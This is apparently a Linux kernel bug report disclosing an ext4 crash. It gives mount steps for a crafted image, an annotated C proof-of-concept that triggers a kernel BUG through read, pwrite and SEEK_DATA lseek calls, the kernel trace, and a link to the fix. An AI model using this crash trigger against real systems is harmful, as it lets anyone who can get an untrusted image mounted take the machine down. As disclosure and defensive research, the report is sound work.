Created attachment 277465 [details] The (compressed) crafted image which causes crash - Reproduce # mkdir mnt # mount -t ext4 15.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c)
/*
 * Reproducer for the kernel BUG reported below (fs/ext4/extents_status.c:253,
 * reached in ext4_es_find_delayed_extent_range).  argv[1] is the mount point
 * of the crafted image; the program itself only opens one file, reads it,
 * writes a short range into it and seeks.  The exposure is mounting an
 * untrusted, inconsistent image (note the "block bitmap and bg descriptor
 * inconsistent" errors logged before the BUG); the kernel-side fix is linked
 * at the end of this report.  The trace below shows Comm: a.out, presumably
 * this same source built without -o.
 */
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <sys/syscall.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>   /* glibc-specific; nothing from it is used below */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
    unsigned char v0[8192];   /* read destination; contents are never inspected */
    unsigned char v1[8192];   /* never initialized: the pwrite64 below stores
                               * indeterminate stack bytes, so the trigger is
                               * presumably the image layout, not the written data */
    char v2[] = ".";          /* v2-v6 and v8-v12 are unused; only v7 is opened */
    char v3[] = "lost+found";
    char v4[] = "foo";
    char v5[] = "foo/bar";
    char v6[] = "foo/bar/hln";
    char v7[] = "foo/bar/æøå";   /* non-ASCII (UTF-8) file name inside the image */
    char v8[] = "foo/bar/baz";
    char v9[] = "foo/bar/sln";
    char v10[] = "foo/bar/acl";
    char v11[] = "foo/bar/fifo";
    char v12[] = "foo/bar/xattr";
    long v13;                 /* fd returned by SYS_open; a -1 failure is never checked */
    chdir(argv[1]);           /* no argc check: argv[1] is NULL when run without an argument */
    v13 = syscall(SYS_open, (long)v7, 2, 0);                /* flags 2 == O_RDWR on Linux */
    syscall(SYS_read, (long)v13, (long)v0, 7424);           /* return value ignored */
    syscall(SYS_pwrite64, (long)v13, (long)v1, 441, 6842);  /* 441 bytes at file offset 6842 */
    syscall(SYS_lseek, (long)v13, 3474, 3);                 /* whence 3 == SEEK_DATA on Linux; the
                                                             * trace places the BUG under
                                                             * ksys_lseek -> ext4_llseek ->
                                                             * iomap_seek_data */
    close(v13);
    return 0;
}
= Kernel message [13983.726442] EXT4-fs: Warning: mounting with data=journal disables delayed allocation and O_DIRECT support! [13983.783120] EXT4-fs (loop0): mounted filesystem with journalled data mode. Opts: (null) [14000.138283] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group 0, block bitmap and bg descriptor inconsistent: 7011 vs 7022 free clusters [14000.141268] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group 1, block bitmap and bg descriptor inconsistent: 7037 vs 7038 free clusters [14000.144276] ------------[ cut here ]------------ [14000.144284] kernel BUG at fs/ext4/extents_status.c:253! 
[14000.145732] invalid opcode: 0000 [#1] SMP KASAN PTI [14000.146787] CPU: 0 PID: 1576 Comm: a.out Not tainted 4.18.0-rc4+ #1 [14000.148076] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [14000.150039] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0 [14000.151300] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75 00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f 1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48 [14000.155067] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297 [14000.156124] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX: ffff8801db3c7ce8 [14000.157555] RDX: 0000000000001900 RSI: 0000000000001901 RDI: ffff8801ebfeb478 [14000.158975] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09: ffffed003d7fd6e3 [14000.160396] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12: 0000000000000000 [14000.161826] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15: 0000000000001900 [14000.163237] FS: 00007fcccc2fb700(0000) GS:ffff8801f7200000(0000) knlGS:0000000000000000 [14000.164835] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [14000.169757] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4: 00000000000006f0 [14000.171222] Call Trace: [14000.171753] ? ext4_iomap_begin+0x641/0x7a0 [14000.172616] ? ext4_dio_get_block+0x80/0x80 [14000.173488] ? ext4_file_read_iter+0xa0/0x170 [14000.174398] ? __vfs_read+0x2a6/0x400 [14000.175152] ? __vfs_write+0x286/0x410 [14000.175923] ? kernel_read+0xa0/0xa0 [14000.176661] iomap_apply+0xd7/0x200 [14000.177392] ? iomap_seek_hole_actor+0x80/0x80 [14000.178302] ? iomap_dirty_actor+0x310/0x310 [14000.179174] iomap_seek_data+0x7c/0xb0 [14000.179942] ? 
iomap_seek_hole_actor+0x80/0x80 [14000.180847] ext4_llseek+0x123/0x160 [14000.181599] ksys_lseek+0x9e/0xd0 [14000.182282] __x64_sys_lseek+0x43/0x50 [14000.183053] do_syscall_64+0x78/0x170 [14000.183816] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [14000.184854] RIP: 0033:0x7fcccbe174d9 [14000.185599] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 8f 29 2c 00 f7 d8 64 89 01 48 [14000.189398] RSP: 002b:00007ffc2ca310c8 EFLAGS: 00000286 ORIG_RAX: 0000000000000008 [14000.190913] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcccbe174d9 [14000.192341] RDX: 0000000000000003 RSI: 0000000000000d92 RDI: 0000000000000003 [14000.193782] RBP: 00007ffc2ca351b0 R08: 00007ffc2ca35298 R09: 00007ffc2ca35298 [14000.195216] R10: 00007ffc2ca35298 R11: 0000000000000286 R12: 0000000000400530 [14000.196652] R13: 00007ffc2ca35290 R14: 0000000000000000 R15: 0000000000000000 [14000.198107] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi autofs4 btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea crc32_pclmul sysfillrect sysimgblt fb_sys_fops ttm drm aesni_intel aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [14000.209140] ---[ end trace 56aa4821a2231d02 ]--- [14000.210125] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0 [14000.211577] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75 00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f 1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48 [14000.215601] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297 
[14000.216700] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX: ffff8801db3c7ce8 [14000.218162] RDX: 0000000000001900 RSI: 0000000000001901 RDI: ffff8801ebfeb478 [14000.219648] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09: ffffed003d7fd6e3 [14000.221112] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12: 0000000000000000 [14000.222560] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15: 0000000000001900 [14000.224047] FS: 00007fcccc2fb700(0000) GS:ffff8801f7200000(0000) knlGS:0000000000000000 [14000.225707] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [14000.226874] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/v4.18-rc5/source/fs/ext4/extents_status.c#L252 Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
The fix for this problem is here: http://patchwork.ozlabs.org/patch/964630/